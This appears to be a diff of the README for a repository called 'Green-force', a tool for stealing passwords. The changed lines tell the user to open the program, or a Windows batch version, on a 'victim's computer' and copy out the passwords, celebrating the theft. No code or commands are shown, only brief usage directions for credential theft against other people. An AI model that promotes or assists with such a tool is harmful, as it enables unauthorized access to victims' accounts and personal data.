vaginessa/Green-force/README.md

 How it works:

+In this version (how it works?):

+> open Green force programm on victims computer!!!

+> copy passwords and you will can go to celebrate it!!!

-(If you want to hack passwords slowly:)
+(If you want to hack passwords slowly in Batch version:)

 > Open bat file on victim’s computer (works only in windows).